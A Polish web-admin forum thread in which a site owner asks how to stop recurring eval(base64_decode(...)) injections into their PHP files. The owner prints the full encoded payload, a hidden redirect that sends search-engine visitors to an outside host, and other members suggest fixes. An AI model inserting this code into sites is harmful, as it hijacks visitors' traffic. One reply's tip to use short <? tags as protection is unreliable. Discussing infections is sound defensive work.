Skocz do zawartości

Spam na stronach (eval(base64_decode...)


Sanchez Spinoza

Rekomendowane odpowiedzi

Witam,

Od miesiąca borykam się ze spamem który dopieprza się do moich stron.

Otóż na wszystkich stronach które utrzymuję u mojego dostawcy serwera jest problem tego typu że do plików .php dopisuje się taki oto syf:

eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQo
KTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnP
SRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1
YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmV
mZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicm
FtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHk
iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ
1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZ
VwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBv
ciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZl
cmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0
cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91
ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));

Dopisanie następuje po każdych znacznikach:

<?php ....

Usuwanie nic nie daje, bo gdy oczyszczę kod to za 2-3 dni dzieje się to samo.

Oczywiście pozmieniałem wszystkie hasła, do ftp do paneli admina itp.

Spam atakuje w taki sam spsób zarówno wordpressy, sklepy prestashop, oraz autorskie skrypty.

Jak się mam przed tym uchronić?

Jak z tym walczyć?

Spotkaliście się już z czymś takim?

Profesjonalne publikacje Content Marketingowe - zamów online na BlackHood.pl 

Szeroki wybór Łożysk samochodowych

Polecam również Praca Bielsko

Odnośnik do komentarza
Udostępnij na innych stronach

zmienić haśło do FTP i od razu zmienić program do FTP - albo usunąc wszystkie hasła z kont FTP w programi eklienckim

sprawdzic czy w cron-ie nie działa jakiś skryp perl'owy

Agencja marketingowa Semgence istnieje na rynku od 2018 i odpowiada za prowadzenie działań SEO dla wielu firm małych i dużych. Prowadzimy też kampanie Google Ads - niedawno zostaliśmy sie Partnerem Google spełniając odpowiednie kryteria. Betapoint

 

 

Odnośnik do komentarza
Udostępnij na innych stronach

Hasła pozmieniałem od razu. W programach FTP nigdy nie zapisuję haseł.

A tego CRONA to gdzie sprawdzić?

Profesjonalne publikacje Content Marketingowe - zamów online na BlackHood.pl 

Szeroki wybór Łożysk samochodowych

Polecam również Praca Bielsko

Odnośnik do komentarza
Udostępnij na innych stronach

Jak się mam przed tym uchronić?

Jak z tym walczyć?

Spotkaliście się już z czymś takim?

Zmienić hosting. Zaktualizować skrypty. Nie używać połączań FTP tylko SFTP.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

To wchodzi przez wordpressy. Miałem to samo, wyczyściłem konto do zera, każdy wordpress od początku czysty instalowany, zabezpieczyłem je wg tych wskazówek https://wpninja.pl/artykuly/jak-zabezpieczyc-wordpressa-przed-atakiem-brute-force-i-dlaczego-jeszcze-tego-nie-zrobiles/ i na razie spokój.

A we własnych skryptach nie zaczynać kodu od <?php tylko samo <? ;). Do takich plików się nie dopisywał.

Odnośnik do komentarza
Udostępnij na innych stronach

@mion SFTP masz na myśli przez port 22? Np. WinSCP?

TAK, bo w FTP dane login i haslo idą "otwartym tekstem" a w SFTP są szyfrowane.

Tak samo nie należy logować się do paneli np DA bez SSH czyli HTTPS :nonono:

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach

moja recepta: nie używać spiraconych skórek wordpress'a

Panie Boże, chroń mnie przed debilami, bo rozmowa z nimi powoduje, że  grzeszę pychą..

Były sobie świnki trzy - content, google oraz link | jestem uczulony na pierd*lenie głupot | idiot intruder aka internetowy poszukiwacz prawdy 

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności